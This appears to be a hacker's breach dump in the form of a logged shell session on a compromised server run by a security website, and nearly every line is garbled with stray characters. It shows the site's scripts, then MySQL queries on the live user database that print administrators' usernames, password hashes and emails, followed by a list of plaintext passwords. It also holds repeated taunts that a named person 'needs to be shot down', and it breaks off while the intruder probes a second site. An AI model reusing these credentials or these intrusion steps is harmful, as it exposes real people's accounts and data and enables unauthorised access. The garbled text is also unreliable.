, X! C9 C% S( s( j" R7 B <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>5 x }6 A& y7 m N7 }1 c1 f
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
$ p* k+ b! @( v8 J5 }, b V <generator>Astalavista.com</generator>
' s- c- E2 F/ `* |. m <webMaster>info@astalavista.com</webMaster>’ . $items . ‘% ~# n+ c. I; O# l x. D
</channel>
$ T& R0 K; N* |+ n8 x3 H/ t1 \</rss>’;
, K, }; r. V9 S+ k8 O8 ?' X
( P/ V% m+ \/ X5 Q7 p3 u if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {* F1 t3 v8 P( f8 k3 G/ ]
unlink (FULLPATH . ‘/feed/exploits.xml’);
5 K% j0 Q+ O! H- ^4 {( |( }$ P }
: h) z8 O( k% ~! N$ g" e
; S' l9 J! c3 o! ?4 ^- } file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
$ H; O$ |3 S4 R6 r[snip]/ l9 N9 W* K9 p
* a% \& l( Q' h$ ]) T
sh-3.2$ cat exploits.sh
' s* g2 S+ ~8 ~: J# p L8 b6 k#!/bin/sh0 [0 c+ m4 }3 w" J+ A$ U; r
& a" c2 f4 u' e/ `###########################################################- V) w$ b2 `+ f" H
# #- a+ _- l* s: ~4 \
# Title: milw0rm exploits adder #
5 }+ ]# u8 |1 |' Y! I# Description: Add all milw0rm exploits to the #3 [% e5 B( Z2 A% L/ S8 R9 ~
# Astalavista.com database #
. F' t$ L5 K7 k/ M) G# #
. L# g3 D6 ]! i5 D7 D# Company: Astalavista Group #
3 p: u0 \6 I* H( N& R/ C. |2 H# Author: Paulo M. Santos #
; w- A- L! D; B% ^. U p. d% p# E-Mail: 链接标记paulo.santos@astalavista.ch #- l2 O: s6 k, ~* y
# #
k9 ^# F$ [' @: U8 [3 k###########################################################
: k; M! ?6 T9 A3 q
9 x- o3 I7 d" y' Z# h4 Y# path* P ^; v% T. ?: {- g; s
this_path=/home/com/public_html/modifications/cronjobs1 u( F f( R+ k& n5 M# F$ A
6 b. G- r- d, X# change directory
. f. d: N+ q- V2 \4 ccd $this_path7 n) d! r4 W+ u% `* c' ?
cd tmp/
9 B9 R" v% q5 Z B3 h6 Z
# ^1 j* Q+ i0 |" k& W# delete files: z O4 ?8 ^7 {
rm -rf milw0rm.tar.* &, i/ R7 h1 ?; n+ b" w3 y2 A6 g
rm -rf milw0rm/ &4 t/ j: X3 H6 S8 s" h1 v7 l
* @: y) {, |$ P2 L" j# wget milw0rm paket' Z' ?2 P, R/ X
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
+ I" ?& S' u. I/ f! l, Z" N' U. R6 U5 Z3 ]7 X$ v; G3 P
# extract milw0rm paket
' P: N' Z: g4 b0 [3 M% ttar -xvf milw0rm.tar.bz2
8 \6 T+ z% M/ h" @. c# S4 N- @, t7 E) L3 ~8 e
# change owner
4 @+ I% I; I1 v3 B7 J: u. lchown -R com .7 ]7 Y* |% ^/ }; G) v* a. ^' y* D
chgrp -R com .
6 ~& d0 ~" N8 k* Y. z) B( C
' p1 Q4 _& d' q9 _1 [# N& b# execute php script
* H B5 d$ M: T3 z- |0 a9 k& Acd $this_path* \2 i ^: b4 E* d5 j9 K7 n
php -q exploits.php2 x& [) o [, X) H. p
5 @; ?& q8 ~" q# delete files1 P6 g* u+ P- u
rm -rf tmp/milw0rm.tar.*- Q4 S. I( w6 z1 h8 w; {
rm -rf tmp/milw0rm// _/ J' e( F% t; G) {* c* O
- } b Z5 m% n/ F+ k
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”; O- h* I, ]2 }, K* `$ f M
Paulo M. Santos needs to be shot down.
/ K. p0 W* r$ O$ ^$ ?
$ N/ f- G# x6 n9 |" j9 Rmysql -u contrexxuser2 -p4 {- Q4 C4 E7 b, i6 F: P
Enter password:
, o( G0 a7 s8 w; _% `5 ?) l; z1 AWelcome to the MySQL monitor. Commands end with ; or \g.
m2 H5 u r* k3 C$ @1 y" AYour MySQL connection id is 261694
9 S7 H; L7 K3 W" yServer version: 5.0.45-community-log MySQL Community Edition (GPL)
' S6 ^) J% _! u! J) _7 C# l! ~9 f q8 T g* o: O3 t8 @/ S2 s5 f
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.# P; o/ s8 a# t" E$ ~0 }4 m& N& z
% D2 P. a4 Z E4 w/ G, R+ U- Pmysql> show databases;( t9 {* m9 G& I5 a3 F
+——————–+
& ]0 y6 @8 N" [| Database |7 h" {% R: p5 k8 Q
+——————–+
+ S; ]+ Z; ~0 s6 [| information_schema |
9 v5 `2 d1 x: ]| com_contrexx2 |& p+ _$ ?# n* c" h
| com_contrexx2_live |; S! B: k5 B+ ]: h) P5 q
| test |
4 x! P% _4 r$ D. c9 M) F2 T) v+——————–+
- V1 c4 D% g- I7 r* A" {( ~8 w4 rows in set (0.00 sec)
+ L$ \" h! M% I5 Y( C* R# y {" w, A! |1 m
mysql> use com_contrexx2_live
! w' M; ~7 s) t/ YDatabase changed# x6 j9 k) B& i/ o! n9 ?8 Z. ?
mysql> show tables;) p I3 K( g8 a* v; a9 F2 A2 c1 X' J
+————————————————–+, @# l2 h0 g* c9 z. X
| Tables_in_com_contrexx2_live | }2 f3 f" @& g: d/ S/ H9 `3 | P, n7 `
+————————————————–+
7 i ^; `' w# D5 D! r| cc_banner_counter |1 L" A+ B% ^9 q' L' J
| cc_search_counter |$ n# D: ^0 b( {# E5 W/ V- D; X
| contrexx_access_group_dynamic_ids |/ P3 V7 V0 B) p
| contrexx_access_group_static_ids |
9 X" ^! f3 f7 x5 m; s9 V2 x* L. O| contrexx_access_rel_user_group |& j# J8 V( @* x2 G7 T
| contrexx_access_settings |/ @& \# g- v/ F9 x% \* O
| contrexx_access_user_attribute |
& k+ M+ M9 ^, x& X/ C5 ~| contrexx_access_user_attribute_name |
4 x! C- ^9 C6 P: y& M) w| contrexx_access_user_attribute_value |
9 S7 v" @: |5 ^, g" a# k4 d' w# t| contrexx_access_user_core_attribute |+ k7 Z4 w+ F. F" |' J
| contrexx_access_user_groups |( p4 @ P2 l W0 i
| contrexx_access_user_mail |
$ v5 O& X7 j7 g; g| contrexx_access_user_profile |
0 H7 f3 U& K4 |& `# F7 d, T| contrexx_access_user_title | Y/ ?2 S7 Q3 S- w0 h7 Y% t% T* C
| contrexx_access_user_validity |
7 q1 d5 _1 O6 \& [5 q; J| contrexx_access_users |4 @. Y% v5 z4 b) J7 O( @
| contrexx_backend_areas |# p. S) V/ y# ~! J
| contrexx_backups |
$ s$ h' \5 U- w# S% E3 s| contrexx_content |+ R, D. c3 m6 d0 Y8 r
| contrexx_content_history |
( g& w% ]6 K( S9 G: M2 j6 [; B| contrexx_content_logfile |! n1 z" b6 x$ s) G
| contrexx_content_navigation |
3 d' f' ]6 _. n- A. @2 J% z8 Y! z, d| contrexx_content_navigation_history |8 I. S% E- Z3 i. n
| contrexx_ids |( ` h* c& ~, I! D/ J
| contrexx_languages |& a# U T3 U! W
| contrexx_lib_country |
" b% _) o8 _% M* ^1 \/ r% R2 G6 f1 g| contrexx_log |
% |" A# @9 N4 e: j5 g+ j| contrexx_module_alias_source |
' y* {" l1 b( z" G1 X9 e$ r| contrexx_module_alias_target |
* B3 H: O+ C+ o( w6 T( e: T2 i% \| contrexx_module_block_blocks |0 |& L: X3 d2 }5 D2 b7 j/ k, H5 s% F
| contrexx_module_block_rel_lang |! C+ X; p5 M# [! g9 d5 Y8 q, R
| contrexx_module_block_rel_pages |" Q# v2 X9 Q+ o" W) T$ {
| contrexx_module_block_settings |
5 J0 s0 R" r4 q4 v| contrexx_module_blog_categories |$ h( H6 H, Z4 r8 h0 B
| contrexx_module_blog_comments |1 f- K) W% y! @. c7 `$ s+ r$ [9 e
| contrexx_module_blog_message_to_category |, z! t9 M4 C/ B- F& |; q# g
| contrexx_module_blog_messages |
& i$ Z1 C2 S3 T. {9 N8 z3 {1 O3 c2 E| contrexx_module_blog_messages_lang |
& Z" E( v8 n9 x, p) F2 A+ C; Q, U| contrexx_module_blog_networks |
# A1 {( @8 C/ k" C' W- j5 i) F& k| contrexx_module_blog_networks_lang |
* f9 m6 G, X9 x# a; z| contrexx_module_blog_settings | C6 i i$ B; ~6 C* M, V
| contrexx_module_blog_votes |, @1 ?5 i; X" u. P
| contrexx_module_calendar |
# ^- ?1 @2 s& S: {5 F" s+ f6 \| contrexx_module_calendar_access |- |4 }) ?2 v7 ]
| contrexx_module_calendar_categories |# s7 Q2 d" W$ G5 S* q8 k* t# q7 ]
| contrexx_module_calendar_form_data |7 {- q% l3 v7 y8 K. l& o) V& e$ b
| contrexx_module_calendar_form_fields |
0 a0 r" Y/ E4 n" J5 k+ |9 W+ v6 ^+ e7 U| contrexx_module_calendar_registrations |
, p8 j% U3 E2 t; }1 H- {| contrexx_module_calendar_settings |
' b5 P0 `- g7 w/ B| contrexx_module_calendar_style |
0 u/ `* W3 L2 D, F0 e5 A| contrexx_module_contact_form |5 |/ S+ i% r$ _$ t8 ]4 l Q' m6 S
| contrexx_module_contact_form_data |
& w, y$ s* p! k0 ^, G| contrexx_module_contact_form_field |
; `; k# L' U/ r- o* |: |- n l| contrexx_module_contact_settings |
]" t. s5 J: ^0 e% i/ f| contrexx_module_data_categories |
+ l. j0 {+ m, H5 K2 H9 P& o" }| contrexx_module_data_message_to_category |
C! Q2 i3 b- W- A* f| contrexx_module_data_messages |
. J9 N( v2 w+ ?/ r8 V8 h| contrexx_module_data_messages_lang |
% B3 [* u7 `7 l' g* \| contrexx_module_data_placeholders |
+ V, [2 k8 ^9 h$ R7 p| contrexx_module_data_settings |: l/ w2 e" M; c/ l4 X, x* u& _
| contrexx_module_directory_access |
8 _0 O- `, G9 H| contrexx_module_directory_categories |
* b9 ]: C4 x$ ~+ N' I' B' J. D| contrexx_module_directory_dir |
" T4 t, R1 G) J! k9 |, v| contrexx_module_directory_inputfields |
3 f3 d+ e, U, j/ c& P& b2 {9 ?| contrexx_module_directory_levels |
; W" @9 M! d2 t% U2 Y+ p: K| contrexx_module_directory_mail |( q. B$ l, e, C5 z$ R" V
| contrexx_module_directory_rel_dir_cat |9 L( X' J% r% b# I( ?. U4 u
| contrexx_module_directory_rel_dir_level |
% r) B+ T, G5 V+ q| contrexx_module_directory_settings |
9 w" M6 L% o) _2 M" K5 z) D| contrexx_module_directory_settings_google |. n) a6 y1 R I: c
| contrexx_module_directory_vote |! m7 F& U$ B* n/ {, T+ E- E. v
| contrexx_module_docsys |
: N! @3 G* p* b/ t0 w2 p( O| contrexx_module_docsys_categories |
* r% X: r8 ^ F# S# V7 K| contrexx_module_egov_configuration |
# |3 s* ?) X3 Y9 t% D% r| contrexx_module_egov_orders |/ Z+ H+ B$ U* B6 Q9 j$ c$ t3 F
| contrexx_module_egov_product_calendar |/ Z h: R& R- i4 f# _/ u6 b/ }3 o
| contrexx_module_egov_product_fields |
* s ~% X& j! ]: E! d# [5 j( ^/ a| contrexx_module_egov_products |6 [2 s( N; I# f6 R/ ?3 | o
| contrexx_module_egov_settings |, ~# ~0 ~ z9 @) C
| contrexx_module_exploits |! ~! {" s2 s: e
| contrexx_module_exploits_categories |
j; z, J; ?2 ]5 A5 s& e| contrexx_module_feed_category |" M' A8 C% {& q3 I9 }1 S% N# `
| contrexx_module_feed_news |8 A6 |, K5 q9 p4 ^
| contrexx_module_feed_newsml_association |! Q9 A, e7 u' K" ] G3 S
| contrexx_module_feed_newsml_categories |
( w; M0 p4 {. g( r! _| contrexx_module_feed_newsml_documents |
, w1 B/ H5 s! u I; X4 Z4 m| contrexx_module_feed_newsml_providers |
9 A2 w% l1 ?, S% @| contrexx_module_forum_access |/ R' Y, d0 U0 A' B6 p0 |! Q' Q
| contrexx_module_forum_categories |5 N: }, @" w+ M7 d
| contrexx_module_forum_categories_lang |
0 k- i* S2 i8 D9 [/ m| contrexx_module_forum_notification |& g0 n. w$ l7 G5 a
| contrexx_module_forum_postings |
3 _. E/ f4 N4 P3 Y5 A; U| contrexx_module_forum_rating |/ I9 u( ?: W' x9 m
| contrexx_module_forum_settings |
# K2 z: f# K% B e- i| contrexx_module_forum_statistics |
% [8 P: w9 p. j+ R' f! _ T| contrexx_module_gallery_categories |
- _; r6 r3 r! T: U5 g4 j| contrexx_module_gallery_comments |
/ x, x- t% Q3 |1 ]) B| contrexx_module_gallery_language |
& m2 B& ?( ~; o2 u \| contrexx_module_gallery_language_pics |8 [" M9 K$ d, G! I1 ]: q
| contrexx_module_gallery_pictures |
3 ]( ]0 x1 m' Z7 T5 Q# G| contrexx_module_gallery_settings | H: F p: }* J+ B
| contrexx_module_gallery_votes |" |3 V4 N T; S0 K6 G9 e
| contrexx_module_guestbook |
; n; z) B7 J% m$ I( D7 x| contrexx_module_guestbook_settings |* [/ j: ~5 \, ?' z" t# T- {
| contrexx_module_livecam |
e5 `# b) `# E% ~) z| contrexx_module_livecam_settings |
; R9 _- n. E+ F( M( E! y. a| contrexx_module_market |
. a" o5 H5 Z( q+ p, f, [6 ^; r| contrexx_module_market_access |
T K7 G, y, O4 f9 m8 |% }1 q| contrexx_module_market_categories |' F) }5 S# a1 B* V9 C; i* {/ W
| contrexx_module_market_mail |
& D) l- Q5 P2 A. ^6 D| contrexx_module_market_paypal |1 x9 H M9 G* s7 L) _5 f
| contrexx_module_market_settings |( c- i2 Y5 _" E' d, z. z
| contrexx_module_market_spez_fields |
, O/ m& w: @; ~0 H j+ F/ b Q| contrexx_module_mediadir_access |' I4 @) | q0 k
| contrexx_module_mediadir_categories |* R8 M1 w5 }2 @+ C L+ Y! u! z
| contrexx_module_mediadir_comments |
$ O+ c2 K: M+ C) J5 ?1 ~. `4 c! H| contrexx_module_mediadir_dir |1 i3 Y5 b) n% ?& r6 M
| contrexx_module_mediadir_inputfields |
4 i9 p8 g+ w( V8 ~) Y| contrexx_module_mediadir_levels |% b; K6 L; I$ i9 W( R, P8 [3 a
| contrexx_module_mediadir_mail |3 n4 Q' I2 ]3 V. b- X- g5 a
| contrexx_module_mediadir_rel_dir_cat |7 i, u+ B4 w& Q6 Q0 H
| contrexx_module_mediadir_rel_dir_level |
( _ D( x0 n; O; r2 B6 S/ f4 s| contrexx_module_mediadir_reports |
1 N; Y$ t5 K! y5 {; m/ f| contrexx_module_mediadir_settings |
2 g- i7 L, m1 _' u! p; x. X9 V* b8 A& ?| contrexx_module_mediadir_settings_google |* P# `7 s6 Z6 R( x! f
| contrexx_module_mediadir_vote |
/ v; Z5 o: ]! y' E| contrexx_module_memberdir_directories |
* r: q( p v4 r0 B- \| contrexx_module_memberdir_name |+ [1 A r- ]8 p: M, ]& p. s
| contrexx_module_memberdir_settings |
. x) x$ j; O9 r6 g% O5 u( p| contrexx_module_memberdir_values |
; q( @( _, s+ |, v| contrexx_module_nettools_allowed_groups |
! A' A' x# d) p/ x- x% L| contrexx_module_nettools_settings |! v1 k6 H6 i7 l) r8 n7 g" e8 \% }* l
| contrexx_module_news |$ n0 A6 W+ D: Z6 M, [0 O0 l) R& R
| contrexx_module_news_access |
9 Q3 S9 I1 C. Q" i) O- m, O7 n| contrexx_module_news_categories |
5 k8 H" U( C3 I- X8 v# `% c| contrexx_module_news_settings |4 ~- a* j. w6 x! u. J/ N9 `6 \% y4 f
| contrexx_module_news_teaser_frame |$ o; g) E* i) m v+ G
| contrexx_module_news_teaser_frame_templates |
8 H8 Z2 ~' J% V6 h$ V' a| contrexx_module_news_ticker |1 S0 f: Y, V+ {0 U
| contrexx_module_newsletter |9 k3 H+ t+ |( I, W" t) q: r
| contrexx_module_newsletter_attachment |$ [, r* D7 B# k& v$ J% j
| contrexx_module_newsletter_category |
" t4 o( q3 {" e5 {8 d| contrexx_module_newsletter_confirm_mail |
6 T7 u) ?' N3 B| contrexx_module_newsletter_rel_cat_news |
6 {8 U1 S4 R- x2 `) G7 M| contrexx_module_newsletter_rel_user_cat |8 c, r3 [& N" ?: l, I# L( |7 Z( D, [
| contrexx_module_newsletter_settings |$ P+ \* J- q) O4 x) f
| contrexx_module_newsletter_template |
2 K& D2 @; o; e; ^7 w. U. L| contrexx_module_newsletter_tmp_sending |
, c4 B t9 u1 R# i* O1 Y| contrexx_module_newsletter_user |' ^+ t' _* j& b+ H' S) ^" Z
| contrexx_module_newsletter_user_title |
& G$ e+ X: F9 m1 @. b* G$ m. i| contrexx_module_onlinetools_defaultports |0 ]7 y8 M4 k* b
| contrexx_module_onlinetools_defaultports_back | z7 x: f5 i# L g: k
| contrexx_module_onlinetools_geolitecity_blocks |
) y) S- O5 u! |" N| contrexx_module_onlinetools_geolitecity_country |
5 q% [( m) ^9 V| contrexx_module_onlinetools_geolitecity_location |
7 V# S% L1 H1 t. h- l8 P+ L; ]1 j| contrexx_module_podcast_category |
) A+ h' p, c$ x$ M& y9 w| contrexx_module_podcast_medium |2 V; N, G P% H6 A9 W
| contrexx_module_podcast_rel_category_lang |" `! [ ^8 X9 c l) D% a
| contrexx_module_podcast_rel_medium_category |$ k5 Y! A( ~( S, k# J
| contrexx_module_podcast_settings |9 u& t7 l- v$ @+ x' ^: ^
| contrexx_module_podcast_template | F9 ^& f# k) q2 F8 k) u
| contrexx_module_proxydb |: e8 l! Y' L) O6 B, S, H' ~+ r i7 K/ O
| contrexx_module_recommend |
4 c7 X' I# T7 @7 w [9 || contrexx_module_repository |
9 z8 W0 S. ^! h7 b- G* E# H8 M| contrexx_module_securitynews_cats |
# l3 M _/ O, h+ ^| contrexx_module_securitynews_feeds |/ L, n+ N6 j) }$ J9 V- j3 a
| contrexx_module_securitynews_news |
$ Z1 W- }7 p" \$ B0 Y| contrexx_module_shop_categories |
2 z( n4 m4 o k% d2 n| contrexx_module_shop_config |
& b& H( y& D7 P& S% e| contrexx_module_shop_countries |4 B4 u! B5 V" ~( e
| contrexx_module_shop_currencies |
; ~ Y |3 g& Z' G| contrexx_module_shop_customers |( d/ S( n; g. c; w
| contrexx_module_shop_importimg |% ^' I9 P2 l5 {3 C* }! _
| contrexx_module_shop_lsv |& o: K9 u3 F6 T4 N7 h T3 y0 e
| contrexx_module_shop_mail |2 {8 v# F1 Y2 i/ S. x% w
| contrexx_module_shop_mail_content |
* E+ T; @) A+ _: n4 `| contrexx_module_shop_manufacturer |, C: `8 Y) A0 E: U! q
| contrexx_module_shop_order_items |" i$ @6 e' f5 j+ t0 u6 @% ~
| contrexx_module_shop_order_items_attributes |
& |% l5 \+ b) s1 ^- }+ z| contrexx_module_shop_orders |' I9 O- l! u" q, ^# N7 [
| contrexx_module_shop_payment |! ^* u: C) `/ c M$ ]
| contrexx_module_shop_payment_processors |. g- t% T) d+ b5 Z; D
| contrexx_module_shop_pricelists |. ?0 `1 l3 L$ B+ j$ {0 U6 x6 f
| contrexx_module_shop_products |: `" b9 ?; B2 h) O9 W" z
| contrexx_module_shop_products_attributes |
4 U6 s& d; t8 W3 W| contrexx_module_shop_products_attributes_name |
* X# h* k; |2 Q| contrexx_module_shop_products_attributes_value |
! `& z% s+ m0 z; ^- n2 p9 D n n( H| contrexx_module_shop_products_downloads |
# K" J+ j' K+ ]. `3 B' o* d| contrexx_module_shop_rel_countries |1 B, E% ?. x) |+ s8 O
| contrexx_module_shop_rel_payment |
% x! M Y: s# A' [1 B| contrexx_module_shop_rel_shipment |7 n- a- I. u1 e- U+ j8 |& x
| contrexx_module_shop_shipment_cost |- l$ c8 Y7 a0 B/ b
| contrexx_module_shop_shipper |
6 O2 z, m5 {0 e$ U0 _0 \4 P+ z. V| contrexx_module_shop_vat |3 S# y7 x9 M K6 j" X( x; E! x0 o
| contrexx_module_shop_zones |
, e) e, a9 z8 U- `| contrexx_module_u2u_address_list |" {( H- {! K0 T5 O/ A m8 H
| contrexx_module_u2u_message_log |% s( n9 U# I( }
| contrexx_module_u2u_sent_messages |7 _% b- A, n1 H& ?0 a& t! P
| contrexx_module_u2u_settings |
+ D e$ h! l* w% {7 G. j) R| contrexx_module_u2u_user_log |
/ o8 Q) r V0 S( `' t7 ` A" Q| contrexx_modules |
- n/ m( ~2 w. U+ |6 m| contrexx_sessions |
5 p& c$ L; ]! a5 h [' f! I$ ~4 j| contrexx_settings |
3 q* w5 f3 j/ b- k| contrexx_settings_smtp |
" V/ D' k" a& }- [0 n3 q+ k0 R& [| contrexx_skins |) h- [! c/ x+ q7 x+ k
| contrexx_stats_browser |6 _; Q' O r! ?$ O g' X
| contrexx_stats_colourdepth |) K) j3 B) R) ]
| contrexx_stats_config |; \7 W; h3 I& A/ ^6 \$ S
| contrexx_stats_country |6 f5 P: T5 e; j4 \9 @5 p5 Z
| contrexx_stats_hostname |
5 ]. [& g+ I3 y9 K( a| contrexx_stats_javascript |
+ X( H/ }; y4 B7 `| contrexx_stats_operatingsystem |
+ Y( ~! {4 }! c9 r9 `| contrexx_stats_referer |1 O' s/ f' z) ^6 M( V! f
| contrexx_stats_requests |. Y8 A7 \) A- r
| contrexx_stats_requests_summary |- ?3 a# ` Q- W* T
| contrexx_stats_screenresolution |8 |( b/ M- P9 B. H* \
| contrexx_stats_search |! N6 g$ Q% e; s6 n1 N1 }
| contrexx_stats_spiders |
! c' \* J/ M1 X7 h| contrexx_stats_spiders_summary |! G* W, i4 ~' d; U
| contrexx_stats_visitors |3 [9 s1 E2 n D9 x* J) T
| contrexx_stats_visitors_summary |
( ?0 c# e* B" @8 u5 P| contrexx_voting_additionaldata |9 `7 ?+ D- f/ o/ ~
| contrexx_voting_email |
1 J& i3 u/ @% j9 E* d9 ]( O| contrexx_voting_rel_email_system |9 `% G$ y5 ?& s! N' c% f# ^( U
| contrexx_voting_results |
( U6 M5 q: y" e| contrexx_voting_system |, T1 Z/ F0 D6 g( t" m" V0 W3 I" J
| foo |
4 L5 P! ]0 w) j6 p( u+————————————————–+' O) u( N$ C$ Y! Q, y5 ?2 m
227 rows in set (0.01 sec)
' Q9 l, ~3 T0 h. j- V+ `, C3 T% D+ w. E6 B0 |3 i0 Z! a0 y# S# t
mysql> select count(*) as skids from contrexx_access_users;; G C" C1 x* b' {0 }7 ^! ]
+——-+
8 v6 L4 `( _/ P9 E7 Y| skids |
) S' V# l/ x. A" _) l) M) G+——-+6 w0 z6 e0 {3 T2 F3 A9 r% _
| 53699 |
" C% |$ m s# T* y1 ?( ~+——-+5 Z: g, k( V$ F) t( X! x
1 row in set (0.00 sec)% X5 s0 ?* f/ r8 _
1 s- v- u1 v$ h
mysql> describe contrexx_access_users;0 L/ ^- T/ Z4 x4 G7 x
+——————+——————————————+——+—–+————–+—————-+4 A, J. w0 [6 ^& d- H2 @, w
| Field | Type | Null | Key | Default | Extra |7 V+ B( m1 m3 J k6 [
+——————+——————————————+——+—–+————–+—————-+
4 D; i8 i( t! D9 I/ j5 d5 v| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
) D5 A- H3 ~) h6 F( g# Q| is_admin | tinyint(1) unsigned | NO | | 0 | |! c# Z) `* `: e N% d s. Y
| username | varchar(40) | YES | MUL | NULL | |
! D. i* d; @( V| password | varchar(32) | YES | | NULL | |
7 \6 c6 Z( d m' e, F| regdate | int(14) unsigned | NO | | 0 | |/ F; O2 b, V3 K; [/ b$ N0 ]
| expiration | int(14) unsigned | NO | | 0 | |
% B+ H9 d, `: B& j4 w| validity | int(10) unsigned | NO | | 0 | |; Y" x2 i. G; t) u' w
| last_auth | int(14) unsigned | NO | | 0 | |) H' W1 U" Q7 R" l; n8 P2 J
| last_activity | int(14) unsigned | NO | | 0 | |
( ?2 O% Q# P4 y* T9 n| email | varchar(255) | YES | | NULL | |
/ p6 f- F9 O0 u# U" h( C| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
+ Q. M8 K4 c2 F8 a' y. D| frontend_lang_id | int(2) unsigned | NO | | 0 | |4 e5 v9 T& t) t: h- c0 D7 e
| backend_lang_id | int(2) unsigned | NO | | 0 | |
* U i$ c0 \$ C| active | tinyint(1) | NO | | 0 | |! [/ Z0 _1 C3 M* b* \4 m! G0 J
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |9 N; O8 f0 ?" L9 _; C! I
| restore_key | varchar(32) | NO | | | |" t0 K( S2 E; [0 J9 V, b" m
| restore_key_time | int(14) unsigned | NO | | 0 | |
* W* W0 d$ C/ D. U) x8 H- ^1 K| u2u_active | enum(’0′,’1′) | NO | | 1 | |
2 X. e( x) }3 `# e2 ]+——————+——————————————+——+—–+————–+—————-+( W2 Y% u# q m J
18 rows in set (0.00 sec)
/ {* {+ Z% N) ?9 w8 t# ?( _9 ~ Z. l/ I+ [+ v
mysql> select username,password,email from contrexx_access_users where is_admin = 1;- b- c/ h; |5 O; |; U, h; z" d
+————+———————————-+—————————–+4 S5 _& e0 T/ N
| username | password | email |1 C5 ` H* c: l
+————+———————————-+—————————–+
x! |' [9 j; c* ]; z$ i2 {% S* ]| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
/ g1 a' d$ h! f% j( R& Z4 A| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |: p; T# S2 z" X4 D2 Y
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
& u; h) g8 l* Q| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
3 E. i% V1 }' Q$ p! Q( u1 N+————+———————————-+—————————–+- G# Q8 W& o9 x" w
4 rows in set (0.04 sec)
! z/ r: p4 V7 ~' U8 [9 O' J% B$ O& ^" j, Z" r- }+ I* z9 J9 h% G
mysql> exit;
. S+ e; G1 c* N; Y3 eBye
6 f4 c# y* ~6 r7 U$ N; o1 P; W' O7 V$ F! {5 j3 V
[~] There you go, your “team of security and IT professionals” is a joke.# r4 `# u+ s3 n
+ N4 s4 w* `& G0 l' {, n+——————————+) C" H" g* I: l: }( h
system:f82BN3+_*6 \; Z9 V$ V3 m
Be1er0ph0r:belerophor4astacom
6 o# a7 G8 |8 N6 y) n1 G3 t# Z. nprozac:asta4cms!/ Z; J( Z: _! Y2 r3 D
commander:mpbdaagf6m8 b: A0 G/ L# V* f1 [. P: \8 S
sykadul:ak29eral; G3 O. [5 u$ `7 ]6 m4 c, y
+——————————+- s$ I- h. A. [. Z* m3 I- \
( l' }; o2 t& @* U
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
! P* H. O- l: x1 ]$ K) o! [$ ?…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.5 X4 {, p4 X4 j% A4 z, C- l7 @8 u( ]5 n
5 t. F G$ e5 H- P( x9 l
[~] Lets move to astalavista.net now,
8 j* W' ]# X# m5 s% n/ U
2 G* @, [- t, z0 @8 Z/ H* p+ CFrom <链接标记[url]https://www.astalavista.net/[/url]>:3 }9 {2 j" ]6 |
>> Everyone knows that the best defense is a good offense.2 ?% e' K- W0 c/ ?/ m: H
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.% D K* b+ Q; U) w& F/ u% l
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
; N1 M/ j5 T" N1 s>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”+ k3 ?* p, P/ G U
7 z6 ?. S5 F/ a6 {
>> Go ahead, try and hack our server . in a completely legal way!
x4 t# u0 ]. U3 l# w9 f/ O>> Learn by doing: We offer our members tricky tasks and challenges on an
$ n% M& |- |& _7 p) z2 t) n& c>> ongoing basis so you can test your knowledge and abilities. You can also
) }( U* ~: Q! k8 q$ ^% E>> demonstrate what you.ve mastered by taking part in regular hacker contests, C5 J% w0 d- I3 a5 R8 m: V
>> and war games9 E/ J; b$ Y, r; |: V
4 E3 h0 n3 y, I4 r[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
" I. o) n0 p( Z; i" P, }9 L
: {3 m; f- E- D5 e$ s[-] Tricky task: Find home dir of astalavista.net6 d+ }& M' A* @3 b- T7 [* h
2 W, e/ o5 O/ W& S8 l0 \sh-3.2$ ls -la ~astanet
* r9 p0 N/ ]$ _1 |+ H, ~$ y: Ftotal 48
# J" `4 ~- t) ~' P/ q( q. Gdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 ., ?$ R5 u! s/ F2 o' G X% W+ `
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 H% m3 Y3 r* z5 f7 y4 e( M7 idrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth5 q7 i1 R& L* ^1 X; z
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history; M/ \1 d1 n: z( }% Y* `
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
7 k+ v7 u2 ^& Q; j2 V6 D$ T0 }; Z-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile7 V c. h& k, C+ }* k
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
j; i6 @5 R; C0 Ydrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
. y) a2 \, C. `8 y; u; v* Jdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap. ^" J3 }) e' Y: M# d; h1 k
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
( j8 S% K" u( Plrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html( l# ^7 n. g, S- U; k
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
( h; ^" W# ~! H/ z: `; l# {7 {; Y, ]' _! Q9 ]1 Y8 |
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/- t$ m0 e5 N6 U0 A& t9 J/ W
sh-3.2$ ls -la
